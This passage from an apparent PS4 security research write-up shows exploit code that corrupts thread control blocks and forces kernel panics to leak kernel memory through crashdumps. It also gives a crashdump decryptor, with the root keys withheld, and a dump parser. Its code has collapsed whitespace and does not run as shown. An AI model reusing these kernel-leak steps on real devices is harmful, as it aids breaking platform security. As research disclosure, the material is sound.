...// spawn threads which will just spin, and modify tcb->tcb_thread// inf loop around nanosleep(30 secs)varthread_map=[];for(varthrcnt=0;thrcnt<600;thrcnt++){varlocal_buf=scratchPtr.plus(0x2000);varrv=doCall(gadgets.pthread_create,local_buf,0,syms.libkernel.inf_loop_with_nanosleep,0);varthread=read64(local_buf);vartcb=read64(thread.plus(0x1e0));vartid=read32(thread);thread_map.push({tcb_thread_ptr:tcb.plus(0x10),thr_idx:thrcnt,tid:tid});}// this was for back when there was no kernel .text aslr :)vardump_base=newU64(0x80000000,0xffffffff);dump_base=dump_base.plus(600*0x10*getDumpIndex());// sync layout so dumped memory can be ordered correctlysendThreadInfo(dump_base,thread_map);// wait for threads to start - delayed start could overwrite tcb_threaddoCall(gadgets.sleep,3);// now set tcb_threaddump_base=dump_base.minus(0xa8);for(vari=0;i<thread_map.length;i++){// 0x10 bytes at each tcb_thread + 0xa8 will be added to dumpvart=thread_map[i];vardumpaddr=dump_base.plus(t.thr_idx*0x10);write64(t.tcb_thread_ptr,dumpaddr);}// panic (here, using namedobj bug to free invalid pointer)kernel_free(toU64(0xdeadbeef));return;}

After a panic and crashdump would occur, the ps4 would reboot and go through its standard fsck procedure. My control script would then cause the ps4 to enter suspend mode, at which point the custom EAP kernel would take over and upload the crashdump to my PC. Once on the PC, the crashdump would be decrypted and parsed in order to extract the leaked 9600 bytes. Then, the process would start all over…for 6 days :)

On firmware ~4.50, the crashdump key generation method was finally changed to require knowledge of an asymmetric key in order to decrypt the dump contents.

// one of the first calls mdbg_run_dump makesintsysdump_output_establish_secure_context_on_dump(){intrv;// eaxu8nonces_to_sign[32];// [rsp+8h] [rbp-48h]// fill globalssysdump_rng_nonce3_128(nonce3);sysdump_rng_nonce4_128(nonce4);memcpy(nonces_to_sign,nonce3,16LL);memcpy(&nonces_to_sign[16],nonce4,16LL);rv=RsaesOaepEnc2048_Sha256(sysdump_rsa_n,sysdump_rsa_e,nonces_to_sign,32,sysdump_rsa_enc_nonces);if(rv)bzero(sysdump_rsa_enc_nonces,0x100uLL);Sha256HmacInit(sysdump_hmac_ctx,nonce4,0x10u);bzero(dump_aes_ctx_iv,0x10uLL);returnrv;}

The above version of sysdump_output_establish_secure_context_on_dump is from firmware 4.55. nonce3 is the value which will be used as the crashdump AES key. This value is only stored in the dump within an RSA encrypted blob. As such, a new approach would be needed to attempt key recovery.

This was probably the most convoluted and lengthy setup I’ve done for a bug which amounts to just an infoleak. But it was a fun experience.

Keep Hacking!

Crashdump Decryptor

'''This decrypts a coredump stored on the "custom" swap partition.The GPT UUID is B4 A5 A9 76 B0 44 2A 47 BD E3 31 07 47 2A DE E2Look for "Decryptor.header_t" (see below)...'''fromCrypto.CipherimportAESfromCrypto.HashimportHMAC,SHA256importbinascii,structfromconstructimport*defaes_ecb_encrypt(k,d):returnAES.new(k,AES.MODE_ECB).encrypt(d)defaes_ecb_decrypt(k,d):returnAES.new(k,AES.MODE_ECB).decrypt(d)defhmac_sha256(k,d):returnHMAC.new(k,msg=d,digestmod=SHA256).digest()defZeroPadding(size):returnPadding(size,strict=True)classRootKeys:def__init__(s,kd,kc):s.kd=binascii.unhexlify(kd)s.kc=binascii.unhexlify(kc)classKeyset:def__init__(s,hmac_key,aes_key):s.hmac_key,s.aes_key=hmac_key,aes_keys.iv=b'\0'*len(s.aes_key)classDecryptor:DUMP_BLOCK_LEN=0x4000versioned_keys={1:[RootKeys('you','should')],2:[RootKeys('probably','find')],3:[RootKeys('these','your-'),# 4.05RootKeys('self',':)'),# 4.07]}secure_header_t=Struct('secure_header',# only seen version 1 so farULInt32('version'),# Aes128Ecb(kd, openpsid)Bytes('openpsid_enc',0x10),# 0x80 bytes of secure_header are hashed for the data_hmac,# but only 0x14 bytes (actual used bytes) are actually written to disk...ZeroPadding(0x80-0x14),)final_header_t=Struct('final_header',Bytes('unknown',0x10),# 1 : unread dump present, 2 : no new dump dataULInt64('state'),ULInt64('data_len'),ZeroPadding(0x10),Bytes('data_hmac',0x20))header_t=Struct('header',secure_header_t,ZeroPadding(0x100-secure_header_t.sizeof()),final_header_t)defkeygen(s,openpsid,root_keys):openpsid_enc=aes_ecb_encrypt(root_keys.kd,openpsid)digest=hmac_sha256(root_keys.kc,openpsid_enc)returnKeyset(digest[:0x10],digest[0x10:])defhmac_verify(s,keyset):hmac=HMAC.new(keyset.hmac_key,digestmod=SHA256)withopen(s.fpath,'rb')asf:hmac.update(f.read(s.secure_header_t.sizeof()))data_len=s.header.final_header.data_lendata_len-=s.DUMP_BLOCK_LENf.seek(s.DUMP_BLOCK_LEN)hmac.update(f.read(data_len))returnhmac.digest()==s.header.final_header.data_hmacreturnFalsedefunwrap_keyset(s):openpsid_enc=s.header.secure_header.openpsid_encversion=s.header.secure_header.versionforroot_keysins.versioned_keys[version]:openpsid=aes_ecb_decrypt(root_keys.kd,openpsid_enc)digest=hmac_sha256(root_keys.kc,openpsid_enc)keyset=Keyset(digest[:0x10],digest[0x10:])ifs.hmac_verify(keyset):print('OpenPSID:\n%s'%(binascii.hexlify(openpsid)))returnkeysetreturnNonedef__init__(s,fpath,default_openpsid=None,default_keyset_id=None):s.fpath=fpathwithopen(s.fpath,'rb')asf:s.header=s.header_t.parse_stream(f)ifs.header.final_header.state==1:s.keyset=s.unwrap_keyset()else:# something happened to the dump (like it was "consumed" after a reboot).# in that case most of the header will be zerodassertdefault_openpsidisnotNone,'must provide openpsid to decrypt dump without secure_header'assertdefault_keyset_idisnotNone,'must provide keyset id to decrypt dump without secure_header'root_keys=s.versioned_keys[default_keyset_id[0]][default_keyset_id[1]]s.keyset=s.keygen(default_openpsid,root_keys)asserts.keysetisnotNone# just decrypt it all at once for now# if we reach here, hmac is already verified or it didn't existwithopen(s.fpath,'rb')asf:f.seek(s.DUMP_BLOCK_LEN)data_enc=f.read()# This should actually be AesCbcCfb128Encrypt,# but it's always block-size multiple in crashdump usage.s.data=AES.new(s.keyset.aes_key,AES.MODE_CBC,s.keyset.iv).decrypt(data_enc)'''        with open('debug.bin', 'wb') as fo:            fo.write(s.data)        #'''

NXDP Decoder

importbinascii,structfromconstructimport*fromioimportBytesIOimportargparsedefsign_extend(value,bits):sign_bit=1<<(bits-1)return(value&(sign_bit-1))-(value&sign_bit)classNxdpObject(object):def__init__(s,obj):s.parse(obj)defparse(s,o):s.obj=odef__repr__(s):stuff=['Unformatted Object:']foriins.obj:ifisinstance(i,int):stuff.append('%16x'%(i))elifisinstance(i,bytes):stuff.append(str(binascii.hexlify(i)))else:stuff.append(repr(i))return'\n'.join(stuff)classNxdpKernelInfo(NxdpObject):kernel_version_t=Struct('kernel_version',ULInt32('field_0'),ULInt32('firmware_version'),ULInt64('mdbg_kernel_build_id'),ZeroPadding(0x20-0x10))defparse(s,o):s.ver=s.kernel_version_t.parse(o[0])def__repr__(s):fw_ver_maj=s.ver.firmware_version>>24fw_ver_min=(s.ver.firmware_version>>12)&0xffffw_ver_unk=s.ver.firmware_version&0xffffw_ver='%02x.%03x.%03x'%(fw_ver_maj,fw_ver_min,fw_ver_unk)l=[]l.append('Kernel Version Info')l.append('  unk %8x'%(s.ver.field_0))l.append('  fw version %s'%(fw_ver))l.append('  kernel build id %16x'%(s.ver.mdbg_kernel_build_id))return'\n'.join(l)classNxdpBuffer(NxdpObject):classBuffer:def__init__(s,va,buf):s.va=vas.buf=bufdefparse(s,o):# seems to be generic; has subtype (1 : ascii string, 2 : raw bytes)# raw bytes are an array of <virtual address, bytes> pairss.buftype=o[0]ifs.buftype==1:s.strbuf=o[1].decode('ascii')elifs.buftype==2:s.bufs=[]forva,size,bufino[1]:assertsize==len(buf)s.bufs.append(s.Buffer(va,buf))elifs.buftype==3:s.buf=o[1]else:assertFalsedef__repr__(s):l=[]l.append('---------buffer begin-------')ifs.buftype==1:l.append(s.strbuf)elifs.buftype==2:forbufins.bufs:l.append('Virtual Address: %16x, Length %x'%(buf.va,len(buf.buf)))# TODO pretty-hexdump# normally used for stacks...should pretty-print stacks tool.append(str(binascii.hexlify(buf.buf),'ascii'))elifs.buftype==3:l.append('Kernel panic summary:')l.append(str(binascii.hexlify(s.buf),'ascii'))l.append('---------buffer end---------')return'\n'.join(l)classNxdpKernelPanic(NxdpObject):defparse(s,o):s.panicstr=o[0].decode('ascii').rstrip('\n')def__repr__(s):return'Panic Message:\n%s'%(s.panicstr)classNxdpKernelPanicLarge(NxdpObject):defparse(s,o):s.panicstr=o[0].decode('ascii')+o[1].decode('ascii')s.unks=o[2:]def__repr__(s):l=['Panic Message(ver2):']l.append('  unk %x%x%x'%(s.unks[0],s.unks[1],s.unks[2]))l.append('  log: %s'%(s.panicstr))return'\n'.join(l)classNxdpKernelTrapFrame(NxdpObject):reg_indices=['rax','rcx','rdx','rbx','rsp','rbp','rsi','rdi','r8','r9','r10','r11','r12','r13','r14','r15','rip','rflags']defparse(s,o):s.trapno=o[0]s.err=o[1]s.addr=o[2]s.regs=[]foridx,valino[3]:s.regs.append((idx,val))def__repr__(s):l=['Trap Frame']l.append('  trapno %x'%(s.trapno))l.append('  err %x'%(s.err))l.append('  addr %16x'%(s.addr))forregins.regs:l.append('  %6s : %16x'%(s.reg_indices[reg[0]],reg[1]))return'\n'.join(l)classNxdpDumperInfo(NxdpObject):defparse(s,o):s.unk=o[0]s.tid=o[1]def__repr__(s):l=['Dumper Info']l.append('  unk %x'%(s.unk))l.append('  tid %x'%(s.tid))return'\n'.join(l)classNxdpProcessInfo(NxdpObject):defparse(s,o):s.pid=o[0]s.subtypes=[]s.subobjs=[]foriino[1]:ifi[0]notins.subtypes:s.subtypes.append(i[0])s.subobjs.append(NxdpParser.parse(i))def__repr__(s):l=['','Process Info']l.append('  pid %x'%(s.pid))l.append('  subtypes seen %s'%(s.subtypes))forsubobjins.subobjs:l.append(str(subobj))return'\n'.join(l)classNxdpSceDynlibInfo(NxdpObject):dynlib_info_t=Struct('dynlib_info',ULInt64('some_tid'),ULInt8('flags'),ZeroPadding(7),ULInt64('ppid'),String('comm',0x20,encoding='ascii',padchar='\0'),String('path',0x400,encoding='ascii',padchar='\0'),Bytes('fingerprint',0x14),ULInt64('entrypoint'),ULInt64('field_454'),ULInt64('field_45c'),ULInt32('field_464'),ULInt32('field_468'),ULInt32('field_46c'),ULInt64('field_470'),ULInt32('p_sig'),ULInt32('field_47c'),# XXX it seems at some point, this field was added...ULInt32('field_480'),)defparse(s,o):iflen(o[0])!=s.dynlib_info_t.sizeof():print('unexpected dynlib info size, %x'%(len(o[0])))s.info=s.dynlib_info_t.parse(o[0])def__repr__(s):l=['Library Info']l.append('  some tid %x'%(s.info.some_tid))l.append('  flags %x'%(s.info.flags))l.append('  parent pid %x'%(s.info.ppid))l.append('  comm %s'%(s.info.comm))l.append('  path %s'%(s.info.path))l.append('  fingerprint %s'%(binascii.hexlify(s.info.fingerprint)))l.append('  entrypoint %16x'%(s.info.entrypoint))l.append('  unks (dynlib) field_454 %16x field_45c %16x field_464 %8x field_468 %8x'%(s.info.field_454,s.info.field_45c,s.info.field_464,s.info.field_468))l.append('  p_sig %8x'%(s.info.p_sig))l.append('  unks (proc)   field_46c %8x field_470 %16x field_47c %8x field_480 %8x'%(s.info.field_46c,s.info.field_470,s.info.field_47c,s.info.field_480))return'\n'.join(l)classNxdpPcb(NxdpObject):# there are more (see struct pcb), but these are what we expect in the dumpreg_indices={59:'fsbase',60:'rbx',61:'rsp',62:'rbp',63:'r12',64:'r13',65:'r14',66:'r15',67:'rip',}envxmm_t=Struct('envxmm',ULInt16('en_cw'),ULInt16('en_sw'),ULInt8('en_tw'),ULInt8('en_zero'),ULInt16('en_opcode'),ULInt64('en_rip'),ULInt64('en_rdp'),ULInt32('en_mxcsr'),ULInt32('en_mxcsr_mask'),)sv_fp_t=Struct('sv_fp',Bytes('fp_acc',10),# TODO why is this nonzero?#Padding(6),Bytes('sbz',6),)savefpu_xstate_t=Struct('savefpu_xstate',ULInt64('xstate_bv'),#Bytes('xstate_rsrv0', 16),ZeroPadding(16),#Bytes('xstate_rsrv', 40),ZeroPadding(40),Array(16,Bytes('ymm_bytes',16)))savefpu_ymm_t=Struct('savefpu_ymm',envxmm_t,Array(8,sv_fp_t),Array(16,Bytes('xmm_bytes',16)),# TODO why is this nonzero?#ZeroPadding(96),Bytes('sbz',96),savefpu_xstate_t)defparse(s,o):s.flags=o[0]s.fpu=s.savefpu_ymm_t.parse(o[1])s.regs=[]foridx,valino[2]:s.regs.append((idx,val))def__repr__(s):l=['Process Control Block']l.append('  flags %x'%(s.flags))l.append('  fpu state %s'%(s.fpu))forregins.regs:l.append('  %s : %16x'%(s.reg_indices[reg[0]],reg[1]))return'\n'.join(l)classNxdpProcessThread(NxdpObject):defparse(s,o):s.tid=o[0]s.subobjs=[]foriino[1]:s.subobjs.append(NxdpParser.parse(i))def__repr__(s):l=['Thread Info']l.append('  tid %x'%(s.tid))forsubobjins.subobjs:l.append(str(subobj))return'\n'.join(l)classNxdpThreadInfo(NxdpObject):thread_info_t=Struct('thread_info',ULInt64('pthread_a8'),ULInt64('pthread_b0'),ULInt64('field_10'),ULInt64('td_priority'),ULInt64('td_oncpu'),ULInt64('td_lastcpu'),# if !td_wchan, then thread->field_458ULInt64('td_wchan'),ULInt32('field_38'),ULInt32('td_state'),ULInt32('td_inhibitors'),String('td_wmesg',0x20,encoding='ascii',padchar='\0'),String('td_name',0x20,encoding='ascii',padchar='\0'),ULInt32('pid'),ULInt64('td_field_450'),ULInt32('td_cpuset'),# XXX this struct size has been changed...Bytes('newstuff',0xbc-0x94))defparse(s,o):s.info=s.thread_info_t.parse(o[0])def__repr__(s):returnstr(s.info)classNxdpTitleInfo(NxdpObject):# this is a new object, so the meanings are a guessdefparse(s,o):s.title_id=o[0].decode('ascii').rstrip('\0')s.app_id=o[1]s.unk0=o[2]s.unk1=o[3]def__repr__(s):l=['Title Info']l.append('  title id   %s'%(s.title_id))l.append('  app id     %x'%(s.app_id))l.append('  unk values %x%x'%(s.unk0,s.unk1))return'\n'.join(l)classNxdpSceDynlibImports(NxdpObject):dynlib_import_t=Struct('dynlib_import',ULInt32('pid'),# IDT indexULInt32('handle'),ZeroPadding(8),# 0x10ZeroPadding(0x20),String('path',0x400,encoding='ascii',padchar='\0'),ZeroPadding(8),Bytes('fingerprint',0x14),# 0x44cZeroPadding(4),ULInt32('refcount'),ULInt64('entrypoint'),ULInt64('dyl2_field_138'),# 0x464ULInt64('dyl2_field_140'),ULInt64('dyl2_field_148'),ULInt64('dyl2_field_158'),ULInt32('dyl2_field_150'),ULInt32('dyl2_field_160'),ULInt64('text_base'),ULInt64('text_size'),ULInt32('field_494'),# 0x498ULInt64('data_base'),ULInt64('data_size'),# 0x4a8ULInt32('dyl2_field_94'),# TODO there seems to be more nonzero stuff in here?Padding(0x6b4-0x4ac))defparse(s,o):# XXX this was added on later fw versions# seems to duplicate handle for some reasons.idx=o[0]# same across versionss.info=s.dynlib_import_t.parse(o[1])def__repr__(s):l=['Import Info']l.append('  id %x'%(s.idx))l.append(str(s.info))return'\n'.join(l)classNxdpVmMap(NxdpObject):vm_map_t=Struct('vm_map',ULInt32('field_0'),ULInt64('start'),ULInt64('end'),ULInt64('field_14'),ULInt64('field_1c'),ULInt64('field_24'),ULInt32('prot'),ULInt32('field_30'),ULInt32('field_34'),String('name',0x20,encoding='ascii',padchar='\0'),ULInt32('field_58'),ULInt32('field_5c'),# XXX this was added on later fw versionsULInt32('field_60'),)defparse(s,o):s.info=s.vm_map_t.parse(o[0])def__repr__(s):l='VM Map Entry: %16x - %16x%x%s'%(s.info.start,s.info.end,s.info.prot,s.info.name)returnlclassNxdpKernelRandom(NxdpObject):defparse(s,o):s.seed=o[0]s.slide=o[1]def__repr__(s):l=['Kernel Random Info']l.append('  seed  %s'%(binascii.hexlify(s.seed)))l.append('  slide %x'%(s.slide))return'\n'.join(l)classNxdpInterruptInfo(NxdpObject):defparse(s,o):s.from_ip=o[0]s.to_ip=o[1]def__repr__(s):l=['Last Interrupt IP Info']l.append('  from %x'%(s.from_ip))l.append('  to   %x'%(s.to_ip))return'\n'.join(l)classNxdpParser:process_types={0x21:NxdpProcessInfo,0x22:NxdpProcessThread,}type_parsers={0x00:process_types,0x01:NxdpSceDynlibInfo,0x02:NxdpThreadInfo,# 0x03 is SCE ID table stuff...seems they removed it from later fw coredumps?0x04:NxdpSceDynlibImports,0x05:NxdpVmMap,0x10:NxdpKernelInfo,0x11:NxdpBuffer,0x21:NxdpKernelPanic,0x22:NxdpKernelTrapFrame,0x23:NxdpPcb,0x24:NxdpDumperInfo,0x25:NxdpKernelRandom,0x26:NxdpTitleInfo,0x27:NxdpInterruptInfo,0x28:NxdpKernelPanicLarge,}@staticmethoddefparse(obj):try:f=NxdpParser.type_parsers[obj[0]]l=1whileisinstance(f,dict):f=f[obj[l]]l+=1returnf(obj[l:])exceptKeyError:returnNxdpObject(obj)classNXDP:def__init__(s,buf):s.buf=bufs.nonce=s.buf.read(0x10)unpacked=s.decode()s.root_raw=unpackeds.parsed=[]foriinunpacked:s.parsed.append(NxdpParser.parse(i))defread_byte(s):returnstruct.unpack('B',s.buf.read(1))[0]defdecode(s):#print('decode @ %x' % (s.buf.tell()))# The idea is that everything eventually ends in leaf node which can be# represented as signed/unsigned integer, or a buffer.# Nodes consist of "uarray"s, which denote children, and# "array"s, which denote groups at the same level.b=s.read_byte()ifb<=0x7f:# unsigned immediatereturnbelifb==0xc0:# next byte is immediate typeb=s.read_byte()ifb==2:# boolean "true"returnTrueelifb==3:# boolean "false"returnFalseelifb==4:# uarray begin# push levelitems=[]whileTrue:i=s.decode()ifiisNone:breakitems.append(i)returnitemselifb==5:# uarray end# pop levelreturnNoneelse:assertFalseelifb==0xc1:# blob_rlereturns.decode_blob_rle()id=b>>4arg=b&0xfifid==0x9:# unsignedreturns.decode_unsigned(arg)ifid==0xa:# arraya=[]foriinrange(arg):a.append(s.decode())returnaelifid==0xb:# blobreturns.decode_blob(arg)elifid==0xd:# signedreturns.decode_signed(arg)elifb>=0xe1:# signed immediatereturnsign_extend(b,8)else:assertFalsedefdecode_unsigned(s,n):x=0foriinrange(n,0,-1):x|=s.read_byte()<<((i-1)*8)returnxdefdecode_signed(s,n):u=s.decode_unsigned(n)# "sign-extend"...# This is normally used to encode kernel addresses,# so actually return unsugned...return(u|(0xffffffffffffffff<<(n*8)))&0xffffffffffffffffdefdecode_blob(s,n):# n = 0 means length is encoded unsigned valueifn==0:n=s.decode()returns.buf.read(n)defdecode_blob_rle(s):# decompressed size is stored firstn=s.decode()# always starts with 0x97 which *doesn't* encode anything...asserts.read_byte()==0x97# slow and simpleblob=b''whilelen(blob)<n:b=s.buf.read(1)ifb==b'\x97':count=s.read_byte()ifcount>0:b=s.buf.read(1)*countblob+=bassertlen(blob)==nreturnblobdefdump(s):foriins.parsed:print(i)if__name__=='__main__':parser=argparse.ArgumentParser(description='PS4 crashdump parser')parser.add_argument('dump_path')parser.add_argument('-i','--openpsid',type=lambdax:binascii.unhexlify(x))parser.add_argument('-k','--keyset_id',type=lambdax:list(map(int,x.split('.'))))args=parser.parse_args()nxdp=NXDP(BytesIO(Decryptor(args.dump_path,args.openpsid,args.keyset_id).data))nxdp.dump()
Viewing all 25817 articles
Browse latest View live




Latest Images